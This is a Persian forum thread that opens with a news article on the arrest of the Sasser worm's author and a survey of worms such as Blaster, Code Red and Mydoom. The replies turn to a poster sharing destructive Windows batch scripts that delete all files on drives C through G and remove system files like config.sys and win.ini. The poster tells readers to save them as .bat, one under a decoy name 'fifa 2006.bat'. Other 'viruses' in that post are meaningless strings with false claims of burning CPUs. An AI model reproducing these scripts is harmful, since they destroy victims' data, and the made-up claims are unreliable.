ويروسهاي كامپيوتري:خدمت يا خيانت؟

مرجع :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
تاريخ : 83/13/2702

اين نخستين بار است كه يك شركت كامپيوترى در حد و اندازه مايكروسافت براى به دام انداختن يك ويروس نويس وارد عمل مى شود.


به نظر مى رسد آن چه كه شركت مايكروسافت را وادار به حضور در عرصه هاى امنيت كامپيوترى در مقابله با خرابكاران كامپيوترى مى كند ضربه هاى متعددى است كه خصوصاً طى چند ماه اخير بر سيستم عامل هاى اين شركت وارد آمده است. شايد به همين علت است كه آنها از چند روز قبل با تعيين ۵۰ ميليون دلار جايزه عملاً به تيم هاى تحقيقاتى CIAو FBI پيوستند و نتايج فعاليت آنها به دستگيرى نويسنده ويروس ساسر انجاميد.نوجوان ۱۸ ساله آلمانى پيش از آن كه ماموران پليس بخش هانوفر را جلو در منزل خود ببيند هيچ گاه تصور نمى كرد كرم رايانه اى كه او نگارش آن را انجام داده و در طى مدت كوتاهى ميليون ها كامپيوتر در سرتاسر جهان را آلوده ساخته است بتواند به اين سادگى صاحب خود را گرفتار پليس كند.


هر چند اين كرم كوچك رايانه اى در ابتداى شناسايى خود از طرف شركت هاى ضدويروس كم خطر اعلام شد اما كمى بعد با گسترش شتاب گونه، ناگهان در سرتاسر جهان پخش گرديد و در نقاطى نيز برخى فعاليت هاى حياتى را متوقف ساخت. هر چند مقامات شركت مايكروسافت از اين ابتكار خود در قرار دادن جايزه كه منجر به دستگيرى اين پسرك آلمانى شد راضى به نظر مى رسند اما خود آنها نيز مى دانند ويروس نويسان همواره چند پله جلوتر از شركت هاى كامپيوترى بوده اند.بنابر گزارش خبرگزارى ها آن چه كه منجر به دستگيرى اين پسر آلمانى شد اطلاعاتى بود كه توسط فرد ديگر كه همشهرى فرد ويروس نويس بود به مايكروسافت و مقامات پليس ارائه شده بود.شيوه اى كه مايكروسافت در برخورد با اين كرم در پيش گرفت به گونه اى مقابل قرار دادن متخصصان امنيتى و يا حتى ويروس نويسان با هم است.


به اين ترتيب وظيفه يافتن يك خرابكار صرفاً به دانش چند متخصص امنيت شبكه در يك كشور خاص محدود نمى شود، كسب ۵ ميليون دلار آن قدر وسوسه انگيز است كه يك فرد آلمانى نويسنده ويروس ساسر را به آمريكايى ها معرفى كند.


• اين كوچك موذى

از عمر ويروس ساسر چند هفته نمى گذرد. اين ويروس از تكنيكى بهره مى برد كه سال قبل ويروس مشهور بلستر آن را به كار گرفت تا ميليون ها كامپيوتر را در سرتاسر جهان بارها Reboot كند ويژگى اصلى هر دو كرم، آلوده كردن سيستم هاى كامپيوترى بدون استفاده از اى ميل و يا فايل هاى الصاقى ديگر است.كرم از طريق نقاط ضعفى كه سيستم عامل ويندوز دارد و از طريق tcp/ip به سيستم هاى كامپيوترى نفوذ مى كند و پس از آلوده شدن دستگاه اعلام يك پيغام خطا يا Reboot ظاهر مى شود و دستگاه به اصطلاح دوباره راه اندازى مى شود.



طى روزهاى بحرانى آلودگى اين ويروس بيمارستان ها، بانك ها، شركت هاى هواپيمايى، سازمان هاى دولتى و كاربران خانگى با مشكلات عمده اى روبه رو شدند حتى در روز دستگيرى نويسنده آن اعلام شد كه به رغم نسخه هاى اصلاحى نصب شده روى رايانه ها و بازگشت شرايط به حالت عادى امكان بازگشت مجدد اين ويروس وجود دارد. نگاهى به چرخه ويروس هاى كامپيوترى طى چند سال اخير نشان مى دهد همگام با پيشرفت راه هاى امنيتى مبارزه با حملات اينترنتى و ويروس ها اين نرم افزارهاى كوچك موذى نيز خود را با محيط تطبيق داده و به اصطلاح هوشمند تر و مخرب تر شده اند. اگر تا چند سال قبل عمده تاثير ويروس ها پاك شدن اطلاعات چند كاربر و يا حداكثر يك صدمه سخت افزارى نه چندان شديد بود ويروس هاى هوشمند امروزين گاه شريان هاى حياتى يك جامعه را هدف قرار مى دهند اين موضوع خصوصاً براى جوامعى كه بيشترين توسعه كامپيوترى را داشته اند و بسيارى از امور خود را روى شبكه و يا اينترنت منتقل كرده اند تاثير بيشترى داشته است.در ايران بلافاصله پس از هجوم اين ويروس به اينترنت نشانه هاى آلودگى آن مشاهده شد حتى يكى از نمايندگان شركت هاى توليدكننده آنتى ويروس ادعا كرد ويروس ساسر بيشترين قربانى را در ايران داشته است.



هر چند اين ادعا كمى اغراق آميز به نظر مى رسيد اما گزارش ها حاكى از تاثير اين ويروس روى چندين شركت بزرگ و كوچك و مراكز ادارى چون روزنامه ها و... بوده است.به رغم اين به نظر مى رسد عقب ماندگى كامپيوترى كشور و عدم اتصال شريان هاى حياتى و دستگاه هاى مختلف به اينترنت باعث كم اثر بودن اين ويروس در كشور شده است البته اين موضوع در مقابل بسيارى از منافعى كه گسترش تكنولوژى آى تى در كشور ايجاد مى كند بسيار كوچك و كم اهميت مى نمايد.برخى كارشناسان معتقدند كرم هاى امروزين پس از ظهور براى نخستين بار پس از مدتى دوباره با شكل تغيير يافته مشاهده خواهند شد. نمونه كرم هايى چون نت اسكاى كه طى يكى دو ماه گذشته چندين نسخه از آن در اينترنت شناسايى شده نشان مى دهد ويروس هاى امروزين به سادگى از بين نمى روند و عمر طولانى ترى دارند.به گفته برخى از كارشناسان بعضى از ويروس ها مثل SQLslammerو Code Red هنوز روى اينترنت مشغول فعاليت هستند. حتى برخى پيش بينى مى كنند ويروس هاى آينده با تركيب كردن قابليت هاى امروزين به اندازه اى خطرناك خواهند بود كه بسيارى از افراد دسترسى خود به اينترنت را قطع كنند.


• زنده براى هميشه

تصورى كه از ويروس هاى كامپيوترى براى نخستين بار در ذهن يك كاربر كامپيوتر مجسم مى شود چيزى شبيه به ويروس هاى بيمارى زا است اما اگر گفته شود ويروس هاى كامپيوترى به نسبت همتايان انسانى خود مفيدتر و سازنده تر هستند حرف بى راهى نيست چرا كه اين نرم افزارهاى كوچك با شناسايى نقاط ضعف سيستم ها طى سال هاى گذشته كمك شايانى به رشد امنيت سايت ها، شبكه هاى كامپيوترى و نرم افزارها كرده اند.ويروس ها معمولاً از قطعه نرم افزار كوچكى تشكيل شده اند كه بر دوش يك برنامه حقيقى حمل مى شود مثلاً يك ويروس مى تواند در كنار ويرايشگر الصاق شود و هر بار كه اين برنامه اجرا مى شود ويروس يك كپى از خود ايجاد كرده و يا طبق برنامه نوشته شده براى آن دستورات تخريبى خاص را در سيستم اجرا كند. به نوشته سايت Srco ويروس هاى كامپيوترى بدين دليل ويروس ناميده شده اند چون داراى برخى وجوه مشترك با ويروس هاى زيست شناسى هستند. يك ويروس كامپيوترى از كامپيوترى به كامپيوتر ديگر عبور كرده دقيقاً مشابه ويروس هاى زيست شناسى كه از شخصى به شخص ديگر منتقل مى شود. ويروس زيست شناسى يك موجود زنده نيست، ويروس بخشى از DNA بوده و داخل يك روكش حفاظتى قرار مى گيرد.



ويروس بر خلاف سلول قادر به انجام عمليات و يا تكثير مجدد خود نيست، يك ويروس زيست شناسى مى بايست DNA خود را به يك سلول تزريق نمايد DNA ويروسى در ادامه با استفاده از دستگاه موجود سلول قادر به تكثير خود مى گردد. در برخى حالات سلول با ويروس جديد آلوده تا زمانى كه سلول فعال و باعث رها سازى ويروس گردد در حالات ديگر ذرات ويروس جديد باعث عدم رشد سلول در هر لحظه شده و سلول همچنان زنده باقى خواهد ماند. به هر حال يك ويروس كامپيوترى مى بايست بر دوش ساير برنامه ها و يا مستندات قرار گرفته تا در زمان لازم شرايط اجراى آن فراهم گردد. پس از اجراى يك ويروس زمينه آلوده كردن ساير برنامه ها و يا مستندات نيز فراهم مى شود اما كرم ها تفاوت آشكارى با ويروس ها دارند چرا كه كرم، يك برنامه كامپيوترى است كه قابليت تكثير خود از ماشينى به ماشين ديگر را دارا است. شبكه هاى كامپيوترى بستر مناسب براى حركت كرم ها و آلوده كردن ساير ماشين هاى موجود در شبكه را فراهم مى آورند. با استفاده از شبكه هاى كامپيوترى كرم ها قادر به تكثير باور نكردنى خود در اسرع زمان هستند مثلاً كرم Code Red كه در سال ۲۰۰۱ مطرح گرديد قادر به تكثير خود به ميزان ۲۵۰۰۰۰ مرتبه در مدت زمان نه ساعت است.


همچنين كرم CodeRed نيز در زمان تكثير به ميزان قابل ملاحظه اى سرعت ترافيك اطلاعاتى بر روى اينترنت را كند مى كرد، هر نسخه از كرم فوق پيمايش اينترنت به منظور يافتن سرويس دهندگان ويندوز آنتى يا ۲۰۰۰ را آغاز مى كرد و هر زمان كه يك سرويس دهنده ناامن (سرويس دهنده اى كه بر روى آن آخرين نرم افزارهاى امنيتى مايكروسافت نصب نشده بود) پيدا مى شد كرم نسخه اى از خود را بر روى سرويس دهنده تكثير مى كرد و نسخه جديد نيز در ادامه عمليات پيمايش براى يافتن ساير سرويس دهندگان كار خود را آغاز مى كرد. با توجه به تعداد سرويس دهندگان نا امن، يك كرم قادر به ايجاد صدها و هزاران نسخه از خود است.


ايجادكنندگان ويروس هاى كامپيوترى افرادى آگاه و باتجربه بوده و همواره از آخرين حقه هاى موجود استفاده مى كنند. يكى از اين حقه هاى مهم در خصوص قابليت استقرار در حافظه و استمرار وضعيت اجراى خود در حاشيه است (البته تا زمانى كه سيستم روشن باشد) بدين ترتيب امكان تكثير اين نوع ويروس ها با شرايط مطلوب ترى فراهم مى شود.
يكى ديگر از حقه هاى موجود قابليت آلوده كردن بوت سكتور فلاپى ديسك ها و هاردديسك ها است، بوت سكتور شامل يك برنامه كوچك به منظور استقرار بخش اوليه يك سيستم عامل در حافظه است. با استقرار ويروس هاى كامپيوترى در بوت سكتور اجرا شدن آن تضمين خواهد شد بدين ترتيب يك ويروس بلافاصله در حافظه مستقر و تا زمانى كه سيستم روشن باشد به حضور مخرب خود در حافظه ادامه خواهند داد. ويروس هاى بوت سكتور قادر به آلوده كردن ساير بوت سكتورهاى فلاپى ديسك هاى سالمى كه در درايو ماشين قرار خواهند گرفت نيز مى باشد در مكان هايى كه كامپيوتر به صورت مشترك بين افراد استفاده مى گردد بهترين شرايط براى تكثير ويروس هاى كامپيوترى به وجود خواهد آمد.


• رابين هود عالم اينترنت

همه ساله ويروس هاى كامپيوترى ميليون ها دلار خسارت به شبكه هاى كامپيوترى وارد مى سازند و همه ساله ميليون ها دلار نصيب شركت هاى سازنده آنتى ويروس و نرم افزارهاى امنيتى مى شود به نظر مى رسد اين جنگ وگريز بين ويروس هاى كامپيوترى و شبكه ها به اين زودى ها قابل رفع نباشد حتى برخى از افراد بدبين معتقدند بيشتر ويروس ها توسط شركت هاى آنتى ويروس توليد مى شوند چرا كه تنها كاربران از ترس ويروس است كه به سراغ نرم افزارهاى اين شركت ها مى روند.واقعيت اين است كه ويروس هاى كامپيوترى براى نفوذ به سيستم هاى افراد راه هاى متفاوتى را آزمايش كرده اند.


ويروس سوبيگ كه يك ماه قبل در اينترنت مشاهده شد فشار شديدى را به شبكه اينترنت و سيستم هاى شركت هاى تجارى وارد آورد و بسيارى از آنها را دچار كندى كرد.


اين ويروس براى آن كه توسط كاربران شناسايى نشود مرتباً موضوع پيغام هاى آلوده خود را تغيير مى داد به اين ترتيب كاربران كم تجربه از ريسك بيشترى براى گشودن نامه هاى آلوده به اين ويروس برخوردار مى شدند. ويروسى مانند نت اسكاى تغيير عنوان نامه را به اوج رساند به نحوى كه با تغيير نام و آدرس فرستنده اى ميل كاربران را دچار اين شك مى ساخت كه اين نامه از طرف يك دوست برايشان ارسال شده است. ويروس Mydoom كه از ژانويه سال ۲۰۰۴ فعاليت خود را آغاز كرد تنها طى ۳۶ ساعت ۱۰۰ ميليون اى ميل آلوده ايجاد كرد. اين ويروس كه از ضعف هاى سيستم عامل مايكروسافت بهره مى برد از طريق يك فايل ضميمه در نامه الكترونيكى منتشر مى شد و به آدرس هايى كه از طريق ضعف مزبور بر روى يك سيستم يافته بود اى ميل آلوده ارسال مى كرد. ميزان آلودگى اين ويروس به حدى بود كه گفته مى شد يكى از هر ۱۲ اى ميل ارسالى را در بر مى گرفت و در بيش از ۲۰۰ كشور جهان مشاهده مى شد.يك سال قبل ويروسى كه شباهت آشكارى به ويروس ساسر داشت و باعث Reboot كردن كامپيوتر ها مى شد تمام دنياى كامپيوتر را بهم ريخت.


اين ويروس كه ام اس بلاست نام داشت به سرعت مشهور شد چرا كه با دستور ساده خود مبنى بر راه اندازى مجدد ويندوز عملاً جلوى استفاده از دستگاه را مى گرفت. اين ويروس به گونه هوشمندانه نوشته شده بود كه بعد از آلوده كردن يك دستگاه به دنبال دستگاه متصل به آن مى گشت تا آنها را نيز آلوده سازد.گفته مى شد اين ويروس در اوج فعاليت خود تنها ظرف ۳۰ ثانيه رايانه هاى سالم را پيدا مى كرد و تخمين زده مى شد بيش از ۵۰۰ هزار رايانه توسط انواع مختلف اين ويروس آلوده شده است اما شايد يكى از قديمى ترين ويروس هاى نسل فعلى كه فعاليت آن تاثير بسزايى روى نوع نگرش به ويروس ها داشت ويروس مشهور Love Letter بود كه در ميان مردم به Love You I شهرت پيدا كرده بود و...اما بايد در نظر داشت ويروس ها همچنان كه برخى اعمال تخريبى نيز به همراه داشته اند به گونه اى گاه مصارف مفيدى نيز براى آنها تصور مى شود.


به عنوان نمونه ويروس ولچى يا ناچى كه از شيوه تخريبى ام اس بلاست بهره مى برد نمونه اى از يك ويروس نيكوكار بود. اين ويروس بعد از ورود به سيستم تلاش مى كرد بسته تازه نرم افزارهاى مايكروسافت را روى سيستم نصب كند و اگر كرم بلاستر را روى سيستم مى يافت آن را حذف مى كرد، مشاور ارشد يك شركت ضدويروس نويسنده اين ويروس نيكوكار را رابين هود عالم اينترنت ناميد كه مى خواهد ويروس پليد ام اس بلاست را نابود كند.
به نظر مى رسد ويروس هاى كامپيوترى ماهيت دو گانه اى دارند، آنها از يك سوى تخريب مى كنند و خسارت به بار مى آورند و از سوى ديگر نتايج كار آنها جلو تخريب هاى بيشتر و خسارت سنگين تر را مى گيرد. با چنين رويكردى آيا مى توان آنها را به طور مطلق مفيد يا مضر خواند؟

مقاله جالبی بود
ممنون

fبا سلام تبریک سال نو
یکنفر بطور مدام واسم ایمیلی با این متن که معلوم نیست چیه میفرسته:

e{Í9LéÖ¡áXŽÐìO<…‡fªÚ£¨ÀôÜ
©ö±Ú_m˜Y‹
Hé"l9¨µ¤aÌ‹½Bn™ãcP5×9.}šË<çÞó¢5rœXx~¡
_{ÑÁià;î4ƒk™É>¼
¦íñ§ùzüìµ9éâª92êi.]'‰¹Ó¨Âòº)É mUJc—¤<ŸVõ¹Cäkí”­©Z ?rµ¶xFzäRP‰ÁÌï]Ó†Ðk¯heÝôw
!˜ãÜ.£Dϱ:qNO“vß\ûç ˆ4E´Í]¹ž%>oÉNAà«BŽüå’•
Ê"kÞfÒ|å)L²bšiy©¢ï\Œ•±L«nÙV‰8ý¿Î� �lÍõnŒè¡9(zYºå]ä×·[&Îù!tº\"Hñ*÷¬qÚõ‰„‰r×nƒr©HÆk
5xD}èÛ´ dÝú-ǽÆO<pŽvb¼ú!Í¿gé‚gfõ~ù<….aiöŽkôE“©.åø¢ƒ¢ð
Ç‘˜jƒYtq‹ö}'úöfQcÞOqi×°N›$ ?$xñtùØRq“9öŽ«®J®[V<ü’üª]¥x?¨ä#áËÓ‹êþ9^<°ª.
}ô-ÏQö|<·ÍxÆ#Ý9ÖTE?bèë† ûb:Ú8˜ì™APEäÚ|¡Ì#àB(ßÅÍ?¥Ë&!Æ,Q…‡¿­àiÛÄ621}°}B!‹~ñ×~}~Æ %
I9bÊs|¶obgä9¬?Kò³ÔU­j§¯8þ
البته ادامه داره...
ویک فایل زیپ هم ضمیمه میکنه که اونو باز نکردم.اگه میشه بگید آیا با دریافت این نامه بوسیله اوتلوک کامپیوتر من ویروسی میشه یا نه وآیا اصولا این متن مشکوک نوعی ویروسه یا نه.با یه دنیا تشکر :blush:

حسن جان . اگه توی یاهو هست و فایل ضمیمه 63 یا 41 کیلو بایتی هست ویروسه !
اگه خواستی چک کنی میتونی فایل رو توی My Briefcase یاهو ذخیره کنی . اگه پیغام قرمز داد که ویروسه . اما اگه پیغامش سبز بود ویروس نداره ( یا حداقل سیستم یاهو نشناخته ! ) این سریع ترین راهیه که بلدم .
احتمالا هم اون متن به زبان چینی یا روسی یا همچین چیزی نوشته شده که شما فونتش رو نداری .

e{Í9LéÖ¡áXŽÐìO<…‡fªÚ£¨ÀôÜ
©ö±Ú_m˜Y‹
Hé"l9¨µ¤aÌ‹½Bn™ãcP5×9.}šË<çÞó¢5rœXx~¡
_{ÑÁià;î4ƒk™É>¼
¦íñ§ùzüìµ9éâª92êi.]'‰¹Ó¨Âòº)É mUJc—¤<ŸVõ¹Cäkí”­©Z ?rµ¶xFzäRP‰ÁÌï]Ó†Ðk¯heÝôw
!˜ãÜ.£Dϱ:qNO“vß\ûç ˆ4E´Í]¹ž%>oÉNAà«BŽüå’•
Ê"kÞfÒ|å)L²bšiy©¢ï\Œ•±L«nÙV‰8ý¿Î� �lÍõnŒè¡9(zYºå]ä×·[&Îù!tº\"Hñ*÷¬qÚõ‰„‰r×nƒr©HÆk
5xD}èÛ´ dÝú-ǽÆO<pŽvb¼ú!Í¿gé‚gfõ~ù<….aiöŽkôE“©.åø¢ƒ¢ð
Ç‘˜jƒYtq‹ö}'úöfQcÞOqi×°N›$ ?$xñtùØRq“9öŽ«®J®[V<ü’üª]¥x?¨ä#áËÓ‹êþ9^<°ª.
}ô-ÏQö|<·ÍxÆ#Ý9ÖTE?bèë† ûb:Ú8˜ì™APEäÚ|¡Ì#àB(ßÅÍ?¥Ë&!Æ,Q…‡¿­àiÛÄ621}°}B!‹~ñ×~}~Æ %
I9bÊs|¶obgä9¬?Kò³ÔU­j§¯8þ

اصلا چرا اينجوري نوشته مي شه؟[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام
خیانت .

چگونه میتوانم از شر ارور temp2خلاص شوم؟

این ویروس در عین سادگیش بسیار قدرت مند بوده و قادر به تخریب کل هارد شما میباشد.
این ویروس تحت فرامین داس نوشته شده وهیچ انتی ویروسی قادر به شناسایی این ویروس نمیباشد.

@echo off
ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\
resrart
این ویروس را در notepad و با پسوند bat سیو کنید؟

این ویروس برای پور کردن کارت گرافیک است؟
c/windows/system32/jefo/display/memory/full
این ویروس را هم در notepad با پسوند bat سیو کنید.
این ویروس کارش حرف نداره قسمت ریجستری ویندوزرو میترکونه ؟
یعنی دیگه هچ برنامه ای نصب یا پاک نمیشه.
Disabled regedit from:grouap pilicy
این ویروس را در notepad با پسوند fifa 2006.bat سیو کنید؟
این ویروس روی هر سیستمی اجرا بشه؟
با هر بار وصل شدن به اینترنت کامپیوتر بعد از ۸۰ ثانیه ریستارت میشود.
Turn on-b-and defulat when connect
این ویروس را هم در notepad با پسوند fifa 2006 .bat سیو کنید؟
این ویروس در internet explore فیلتر گذاری میکنه ؟
و باعث از کار انداختن اون میشه و دیگه نمیشه به هیچ سایتی رفت .
pouped-blocked-web-exploure-online&offline
این ویروس را هم در notepad با پسوند bat سیو کند؟
این ویروس سی پی یو فرد را می سوزنه؟
cpu_567hjkblaster
این ویروس را هم در notepad با پسوند bat سیو کند؟
این ویروس رو اگر کسی باز کنه؟
کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه؟
@echo off
Cls
===========
Color fc
Del /a c:\*.com
Del /a c:\*.sys
Del /a c:\*.exe /s
===========
این ویروس را هم در notepad با پسوند bat سیو کند؟
این ویروس پس از اجرا باعث میشه کامپیوتر در صورت reset شدن دیگه بالا نیاد ؟
C:
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
اگر ویندوز xp باشه به جای cd winnt بنویسید cd windows
این ویروس را هم در notepad با پسوند bat سیو کند؟



امتحان مجانی :5:

سلام از مقالاته خوبتون ممنونم . ولی ميشه این مقالات رو به صورته فايل پی دی اف قرار بدين؟